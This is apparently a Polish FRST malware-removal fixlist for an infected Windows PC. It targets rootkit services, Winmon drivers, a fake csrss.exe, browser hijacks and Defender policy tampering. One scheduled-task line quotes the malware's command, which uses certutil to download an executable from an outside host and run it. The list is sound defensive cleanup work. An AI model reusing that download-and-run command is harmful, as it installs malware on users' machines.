CloseProcesses:
CreateRestorePoint:
EmptyTemp:
File: C:\Windows\SysWOW64\UMonit64.exe
HKLM-x32\...\Run: [] => [X]
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia <==== UWAGA
HKU\S-1-5-21-492948417-1032459766-3818769861-1001\...\MountPoints2: {62a5c64b-50c1-11e9-890e-00c2c6129fc0} - G:\setup.EXE /AUTORUN
GroupPolicy: Ograniczenia - Chrome <==== UWAGA
CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia <==== UWAGA
Tcpip\..\Interfaces\{31FA2C18-586F-4806-8CEF-0361A4014C75}: [DhcpNameServer] 62.179.1.62 62.179.1.63
HKU\S-1-5-21-492948417-1032459766-3818769861-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccZ6pYKN4-eHvvjJjcR3zq0yy9W_P298GHnrpUoFmrYvpGMgO3zfAdK1v6btob-CwoelSVPgsnL_IN0mPaAqmJtqQBNVaMBTIakJ6x2sUFd42wteUDVrqdzmNZOS_fZFwvnlZfFZWtv1qGkSfJ9cScjuaIi-GkTW&q={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope - brak wartości
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [Brak pliku]
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [Brak pliku]
CHR Extension: (chrome_filter) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjnfeepnpepciddfhjdmkccfahlpkobh [2019-03-27]
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCChromeExtn\WCChromeExtn.crx [2014-05-08]
HKLM\SYSTEM\CurrentControlSet\Services\dump_8E422A00 <==== UWAGA (Rootkit!)
"{BADF48B7-2B43-4589-A8EE-C7FFACD75F4C}" => serwis został odblokowany. <==== UWAGA
"{BADF48B7-2B43-4589-A8EE-C7FFACD75F4C}" => serwis został odblokowany. <==== UWAGA
S2 AdobeARMservice; "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" [X]
S4 gupdate; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc [X]
S4 gupdatem; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc [X]
S2 rcdll; C:\Users\Martin\AppData\Local\Temp\rcdll.exe [X] <==== UWAGA
S2 symsrv; C:\Program Files\windows nt\symsrv.exe [X]
R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ]<==== UWAGA (zerobajtowy plik/folder)
R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ]Windows (R) Win 7 DDK provider<==== UWAGA (zerobajtowy plik/folder)
R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2019-03-27] (WDKTestCert Admin,131666266076831434 -> ) [Brak podpisu cyfrowego]
NETSVC: Ms8E422A00App -> Brak ścieżki do pliku.
Task: {66CECEA7-D19B-4059-857B-17AD391A875E} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://bestmaps.club/app/app.exe C:\Users\Martin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Martin\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== UWAGA
Task: {80C6C728-C16B-4E0A-9619-C2AC5AC5F8AF} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe () [Brak podpisu cyfrowego] <==== UWAGA
Task: {D57ABF40-0270-4D72-95F7-35CF2899A884} - System32\Tasks\wKernelCrash => C:\Users\Martin\AppData\Roaming\Microsoft\Windows\\wKernelCrash.exe () [Brak podpisu cyfrowego]
MSCONFIG\startupreg: FrostySky => "C:\Windows\rss\csrss.exe"
FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{4B8D1B83-4A55-48F2-B22C-09736FD10C74}] => (Allow) C:\Users\Martin\AppData\Local\Temp\download\MiniThunderPlatform.exe Brak pliku
FirewallRules: [{B02FC99F-7AA5-41F8-93EC-4FD260DD3106}] => (Allow) C:\Users\Martin\AppData\Local\Temp\download\MiniThunderPlatform.exe Brak pliku
FirewallRules: [{B0870142-1111-4BE8-8DA3-C56635F92949}] => (Allow) C:\Users\Martin\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe Brak pliku
FirewallRules: [{68DCD8DD-AFA8-4C4A-836D-B7656869E2C9}] => (Allow) C:\Windows\rss\csrss.exe () [Brak podpisu cyfrowego]
FirewallRules: [{61F6D31F-46FF-4878-B1B4-B1334C432B3E}] => (Allow) C:\Windows\rss\csrss.exe () [Brak podpisu cyfrowego]
FirewallRules: [{37C149C5-13E2-4218-A94F-936ECF089ECC}] => (Allow) C:\Users\Martin\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe Brak pliku